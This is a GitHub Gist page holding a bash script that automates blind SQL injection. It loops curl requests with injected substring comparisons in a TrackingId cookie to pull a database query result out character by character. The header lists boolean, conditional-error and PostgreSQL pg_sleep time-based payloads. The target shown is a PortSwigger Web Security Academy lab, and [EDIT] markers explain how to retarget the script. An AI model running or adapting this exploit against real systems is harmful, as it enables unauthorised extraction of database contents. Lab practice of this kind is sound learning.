Last active
February 22, 2024 19:07
-
-
Save p4p1/5020987a78c227de512bf32e938e0c61 to your computer and use it in GitHub Desktop.
🎊🎊🎊🎊
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# blind_sql.sh | |
# Created on: Sun 17 Oct 2021 02:35:42 AM BST | |
# | |
# ____ __ ____ __ | |
# ( _ \ /. |( _ \/ ) | |
# )___/(_ _))___/ )( | |
# (__) (_)(__) (__) | |
# | |
# Description: | |
# This tool is used to test for blind SQL Injections to exploit this | |
# we will look for differences inside of the response and if there is | |
# we will know if we matched a correct pattern. There will be an [EDIT] | |
# tag on the areas where a user needs to change the data supplied by the | |
# script to aid in exploitation. | |
# Note: | |
# $query -> stands for the query | |
# $j -> stands for the position of the character in the string | |
# $i -> is the character currently beeing tested | |
# Payloads: | |
# https://portswigger.net/web-security/sql-injection/cheat-sheet | |
# - ' AND substring(($query),$j,1)='$i | |
# - ' AND (SELECT CASE WHEN (SUBSTR(($query),$j,1)='$i') THEN to_char(1/0) ELSE 'a' END FROM dual)='a | |
# - '%3b SELECT CASE WHEN (substring(($query),$j,1)='$i') THEN pg_sleep(10) ELSE pg_sleep(0) END FROM $db_name-- | |
charset=$(echo {0..9} {A..z} \. \: \, \; \- \_ \@) | |
URL="https://0ade00b10430eecf807cf9fe00590036.web-security-academy.net" # [EDIT] change with correct endpoint | |
truestring="Giant Pillow Thing" # [EDIT] change with the string on true statements | |
maxlength=30 # [EDIT] change with length of result | |
result="" | |
query="SELECT @@version" # [EDIT] change with the query needed | |
cut_it_off=1 | |
echo -n "Found: " | |
for ((j = 1; j < $maxlength; j+=1)); do | |
for i in $charset; do | |
cut_it_off=1 | |
echo -n "$i" | |
# [EDIT] this section can be edited bellow to have a curl request addapted | |
# to the website you are testing. Referance to the payload setion in header of | |
# this file for payload sample. | |
curl "$URL" -X GET -d "session=CZ384lrLWnrJrJm7uqkiB8PLKlgpNv4D; TrackingId=v7aOHBncsO6lUJym' AND substring(($query),$j,1)='$i" -s | grep "$truestring" &> /dev/null | |
# Time base sql injection section | |
#time=$(/usr/bin/time -f "%e" curl "$URL" -H "Cookie: TrackingId=abc'%3b SELECT CASE WHEN (substring(($query),$j,1)='$i') THEN pg_sleep(10) ELSE pg_sleep(0) END --" -s -o /dev/null 2>&1 | cut -d"." -f1) | |
#if [ $time -ge 10 ]; then | |
# Conditional error | |
#curl "$URL" -X GET -d "session=CZ384lrLWnrJrJm7uqkiB8PLKlgpNv4D; TrackingId=v7aOHBncsO6lUJym' AND substring(($query),$j,1)='$i" -s | grep "$truestring" &> /dev/null | |
if [ "$?" == "0" ]; then # Comment this to switch to time based | |
result="${result}${i}" | |
cut_it_off=0 | |
break | |
else | |
echo -ne "\b \b" | |
fi | |
done | |
if [ $cut_it_off -eq 1 ];then | |
break | |
fi | |
done | |
echo | |
exit |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment